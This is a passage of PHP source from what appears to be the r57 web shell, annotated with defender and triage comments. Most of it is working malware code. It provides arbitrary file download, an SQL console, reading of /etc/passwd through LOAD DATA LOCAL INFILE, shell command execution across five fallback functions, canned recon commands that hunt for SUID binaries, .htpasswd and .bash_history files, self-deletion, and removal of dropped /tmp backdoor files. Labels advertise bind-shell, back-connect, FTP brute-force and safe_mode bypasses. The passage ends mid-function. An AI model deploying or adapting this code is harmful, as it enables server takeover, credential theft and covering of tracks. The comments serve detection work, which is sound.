// into the SQL as given, and the whole table is held in memory before output.
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
// Closes the connection for the selected backend; errors are suppressed.
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
// Returns the backend's affected-row count for the last statement, passing the
// stored result handle to the client call; 0 for an unknown backend.
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
// cmd=download_file handler: opens the path given in POST field d_name and streams it
// back as an attachment, optionally compressed per POST field `compress`.
// No path restriction is applied, so any file readable by the PHP process user can be
// retrieved (configuration files, keys, other sites' sources on shared hosts).
// Defender notes: look for POST requests carrying cmd=download_file / d_name and for
// attachment responses from a script that has no reason to serve downloads. Request
// bodies are normally absent from access logs, so WAF or audit logging of POST bodies
// is what exposes this. err() is defined outside the visible part of the listing.
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
else
{
// Discards anything already buffered so the response holds only the file bytes.
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
// compress() fills $mime_type / $content_encoding and may rename $filename.
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
// ?phpinfo handler: prints the full phpinfo() page (versions, loaded modules, paths,
// environment variables) and stops. This is host reconnaissance; listing phpinfo in
// disable_functions removes it.
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
// cmd=db_query handler: an interactive SQL console. Backend type, server, port,
// credentials, database and the SQL text all come from POST fields; the SQL is split
// on ';' and each piece longer than five characters is executed.
// Defender notes:
//  - The connection originates from the web server, so database logs show it as an
//    ordinary application host. Look for statements the application never issues.
//  - The supplied credentials are echoed back as hidden form fields, so they appear
//    in the HTTP response body.
//  - The "Load file" part uses LOAD DATA LOCAL INFILE with a scratch table named
//    UnKn0wN to read a file through the MySQL client. The table name in query or
//    audit logs is a direct indicator; disabling local_infile on the server blocks it.
// in() and ws() are helpers defined outside the visible part of the listing.
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=Black>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=#DF0000><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=#DF0000><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=#DF0000><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
// query() returns 0 = error, 1 = result set, 2 = statement without result set.
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
// Column names and cell values are HTML-escaped before being printed.
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td class=main bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
// The listings below call mysql_* directly instead of going through $sql, so they
// rely on the default MySQL link regardless of the backend chosen.
echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
$query_db = mysql_query("SHOW DATABASES;");
while ($query_db_row = mysql_fetch_array($query_db))
{
echo $query_db_row[0]."\n";
}
echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
if (($_POST['mysql_db']) && $sql->select_db())
{
$query_tables = mysql_query("SHOW TABLES;");
while ($query_tables_row = mysql_fetch_array($query_tables))
{
echo $query_tables_row[0]."\n";
}
}
echo "</textarea></div></td></tr></table></div>";
}
// Re-emits the connection parameters, including the password, as hidden fields so
// the next submission reuses them.
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \"><br /><br />";
echo "<b>File content</b><br><br>";
echo "<textarea cols=121 rows=15 name=showloadfile>";
// File read through the database client: scratch table is dropped, created, filled
// from the path in POST field `loadfile`, read back, then dropped again.
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
@mysql_query("CREATE TABLE `UnKn0wN` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE UnKn0wN FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
$r = @mysql_query("SELECT * FROM UnKn0wN");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
echo "</textarea></div>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
// ?delete handler: the script removes its own file. After this, evidence has to come
// from access logs, backups or file-system timeline data, not from the web root.
if(isset($_GET['delete']))
{
@unlink(__FILE__);
}
// ?tmp handler: deletes a fixed list of files under /tmp. Presumably these are helper
// binaries and sources dropped by parts of the shell outside this listing - verify.
// The paths are worth adding to file-integrity and hunt rules as they stand.
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
// ?phpini handler: prints every php.ini directive with its local and master value as
// an HTML table, then stops. This exposes the hardening state of the host
// (disable_functions, open_basedir, upload limits and so on). ws() is a helper
// defined outside the visible part of the listing.
if(isset($_GET['phpini']))
{
echo $head;
// Formats one directive value for display: empty values become "no value", booleans
// and null become words, arrays/objects are rendered with print_r, and the result is
// passed through U_wordwrap(). The loose == '' test runs first.
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
// HTML-escapes $str and inserts <wbr /> every 100 characters; the regex then moves
// any <wbr /> that landed inside an HTML entity to just after the entity.
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Master Value</b></div></font></td></tr>';
// Directive names are printed as returned by ini_get_all(); values go through U_value().
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
// Host-information handler for the `cpu` query parameter: prints "key : value" lines from a
// file as a two-column HTML table, then exits.
if(isset($_GET['cpu']))
{
echo $head;
echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#DF0000><b>CPU</b></font></div></td></tr></table><table width=100%>';
// NOTE(review): the path is the relative name "cpuinfo", resolved against the current
// working directory; if no such file exists there, the "---" row below is printed instead.
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
// Split each line on ':'; an empty second field is shown as "---".
// NOTE(review): a line without ':' leaves $info[1] undefined, and $r is appended to
// without being initialised in this handler. File content is echoed without HTML escaping.
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
// Host-information handler for the `mem` query parameter: same layout as the `cpu` handler,
// reading "key : value" lines from a file and printing them as an HTML table, then exiting.
if(isset($_GET['mem']))
{
echo $head;
echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#DF0000><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
// NOTE(review): relative name "meminfo", resolved against the current working directory;
// when file() fails the "---" row below is printed instead.
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
// Split each line on ':'; an empty second field is shown as "---".
// NOTE(review): a line without ':' leaves $info[1] undefined, and $r is appended to
// without being initialised in this handler. File content is echoed without HTML escaping.
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
// User-interface label table. Entries are looked up elsewhere in the file as
// $lang[$language.'_textNN'] / '_buttNN' / '_errNN'; only the 'eng_' prefix is defined here.
// Triage note: the labels enumerate the script's feature set (command execution, port bind,
// back-connect, file transfer, SQL access, FTP brute-force, mail, safe_mode/open_basedir
// bypass tests). Because they are plain string literals they are convenient static-detection
// anchors once the outer eval/gzinflate/base64 layer has been removed.
$lang=array(
/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Use',
'eng_text21'=>' New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass with load file in mysql - edited by W.A.S',
'eng_text36'=>'Db . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_butt10'=>'Save',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_butt12'=>'Find',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'Create/Delete',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_butt14'=>'Download',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text102'=>'Mail',
'eng_text103'=>'Send email',
'eng_text104'=>'Send file to email',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Send',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
'eng_text116'=>'Copy from',
'eng_text117'=>'to',
'eng_text118'=>'File copied',
'eng_text119'=>'Cant copy file',
'eng_text120'=>'SQL-Server',
'eng_err0'=>'Error! Can\'t write in file ',
'eng_err1'=>'Error! Can\'t read file ',
'eng_err2'=>'Error! Can\'t create ',
'eng_err3'=>'Error! Can\'t connect to ftp',
'eng_err4'=>'Error! Can\'t login on ftp server',
'eng_err5'=>'Error! Can\'t change dir on ftp',
'eng_err6'=>'Error! Can\'t sent mail',
'eng_err7'=>'Mail send',
'eng_text200'=>'read file from vul copy()',
'eng_text202'=>'where file in server',
'eng_text300'=>'read file from vul curl()',
'eng_text203'=>'read file from vul ini_restore()',
'eng_text204'=>'write shell from vul error_log()',
'eng_text205'=>'write shell in this side',
'eng_text206'=>'read dir',
'eng_text207'=>'read dir from vul reg_glob',
'eng_text208'=>'execute with function',
'eng_text209'=>'read dir from vul root',
'eng_text210'=>'DeZender ',
'eng_text211'=>'::safe_mode off::',
'eng_text212'=>'Close safe_mode with php.ini',
'eng_text213'=>'Close security_mod with .htaccess',
'eng_text214'=>'Admin name',
'eng_text215'=>'IRC server ',
'eng_text216'=>'#room name',
'eng_text217'=>'server',
'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
'eng_text219'=>'Get file to server in safe_mode and change name',
'eng_text220'=>'show file with symlink vul',
'eng_text221'=>'zip file in server to download',
'eng_text222'=>'2 symlink use vul',
'eng_text223'=>'read file from funcution',
'eng_text224'=>'read file from PLUGIN',
'eng_text225' => 'htaccess safemode and open_basedir bypass',
'eng_text226' => 'Write to file',
'eng_text227' => 'Content',
'eng_text228' => 'SSI safe_mode bypass',
'eng_text229' => 'COM functions safe_mode and disable_function bypass',
'eng_text230' => 'ionCube extension safe_mode bypass',
'eng_text231' => 'win32std extension safe_mode bypass',
'eng_text232' => 'win32service extension safe_mode bypass',
'eng_text233' => 'perl extension safe_mode bypass',
'eng_text234' => 'FFI extension safe_mode bypass',
'eng_butt65'=>'Write',
);
/*
Command aliases
They save retyping the same commands over and over. ( Made thanks to my natural laziness )
You can add or change the commands yourself.
*/
// Menu of canned shell commands: the key is the label shown in the UI, the value is the
// command line. The set is host reconnaissance: SUID/SGID binaries, world-writable files and
// directories, configuration and credential files (config*, service.pwd, .htpasswd,
// .bash_history, .mysql_history, .fetchmailrc), extended file attributes and listening ports.
// Triage note: these exact command lines, spawned by the web-server account, are strong
// process-creation indicators; a `find /` over the whole file system from a PHP worker is
// rarely legitimate. The last entry's label is a row of dashes used as a visual separator.
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the page layout (table headers and footers, bracket and arrow
// glyphs, font tag, form open/close). They carry no logic; the first literal spans two lines,
// so the line break is part of the string.
$table_up1 = "<tr><td class=main bgcolor=Black
><font face=Verdana size=-2><b><div class=tt align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td class=main>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=#DF0000>4</font>";
$lb = "<font color=#DF0000>[</font>";
$rb = "<font color=#DF0000>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
// Every form posts back to the same script (no action attribute, method POST).
$fs = "<form name=form method=POST>";
$fe = "</form>";
// Account-enumeration handler for the `users` query parameter: prints the names returned by
// get_users() (one per line in a textarea) and links to the script's `?brute&page=crack`
// view, then exits. $language is set outside this part of the file.
// Triage note: requests with `?users` followed by `?brute&page=crack` in the access log
// indicate the account list was pulled as input for the password-guessing feature.
if(isset($_GET['users']))
{
echo $head;
// get_users() returns 0 or an empty array on failure; both take the error-label branch.
if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=#DF0000>".$lang[$language.'_text96']."</font></center>"; }
else
{
echo '<center><textarea cols=20 rows=20>';
// Names are written into the page without HTML escaping.
foreach($users as $user) { echo $user."\n"; }
echo '</textarea></center>';
}
echo "<div align=center><br><b><a href=".$_SERVER['PHP_SELF']."?brute&page=crack><font size=5 color=Red>BRUTE IT!</font></b></a><br><br><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
// Working directory: a POSTed `dir` value is passed straight to chdir(), so the client picks
// the directory that every later relative path in this request is resolved against.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
// $unix ends up 0 when the cwd looks like a drive-letter path (second character ':'), else 1.
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// Fallback when getcwd() returned nothing: decide from the OS environment variable, then
// from php_uname(); with no information at all, "-" is recorded and Unix is assumed.
if(empty($dir))
{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
else
{
// NOTE(review): eregi() was removed in PHP 7.0, so this branch only works on older runtimes.
if(@eregi("^win",$os)) { $unix = 0; }
else { $unix = 1; }
}
}
// Content-search handler: runs when the POST carries s_dir, s_text and cmd=search_text.
// It builds a SearchResult over the requested directories, runs the search and prints every
// matching line grouped by file, then exits.
// Triage note: this reads every file it can reach under the given directories, so a single
// request can surface credentials or keys; POST bodies are usually absent from access logs,
// so look for bursts of file reads by the web-server account instead.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
{
echo $head;
// The extension filter (s_mask) is only applied when the `m` field is also set.
if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
// Arguments are (phrase, case): 0,0 means no word-boundary wrapping and case-insensitive.
$sr->SearchText(0,0);
$res = $sr->GetResultFiles();
$found = $sr->GetMatchesCount();
$titles = $sr->GetTitles();
$r = "";
if($found > 0)
{
$r .= "<TABLE width=100%>";
// $res maps file name => (line number => highlighted line text).
foreach($res as $file=>$v)
{
$r .= "<TR>";
$r .= "<TD class=main colspan=2><font face=Verdana size=-2><b>".ws(3);
// On non-Unix hosts the path is shown with backslashes; the name is not HTML-escaped.
$r .= (!$unix)? str_replace("/","\\",$file) : $file;
$r .= "</b></font></ TD>";
$r .= "</TR>";
foreach($v as $a=>$b)
{
$r .= "<TR>";
$r .= "<TD class=main align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
$r .= "<TD class=main><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
$r .= "</TR>\n";
}
}
$r .= "</TABLE>";
echo $r;
}
else
{
echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
// Capability probe: runs the shell command `echo abcr57` through ex() and switches $safe_mode
// on unless "r57" is found at offset 3 of the output, i.e. unless command execution works.
// $safe_mode is initialised outside this part of the file.
// Triage note: the fixed command `echo abcr57` executed by the web-server account on each
// page load is a recognisable process-creation indicator for this script family.
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Server banner for display; "-" when the environment variable is empty.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
/**
 * Build a run of $i filler characters, used to pad the HTML output.
 * Errors from str_repeat() are silenced with @.
 */
function ws($i)
{
    $filler = " ";
    $padding = @str_repeat($filler, $i);
    return $padding;
}
// Run the command line $cfe on the host and return its output as a string ('' for an empty
// command or when no method produced output). Every call is prefixed with @, so failures
// leave no PHP warning.
// The function walks a fallback chain of five process-spawning APIs: exec, shell_exec,
// system, passthru and popen, using the first one available. Hardening therefore has to
// cover all five (for example through the disable_functions ini directive); blocking only
// one of them leaves the others usable. Triage note: every path ends in a child process of
// the PHP worker, which is what process-creation telemetry will show.
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
// exec() fills $res with output lines; they are re-joined with newlines.
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
// system() prints directly, so the output is captured through an output buffer.
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
// Same buffering approach as for system().
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
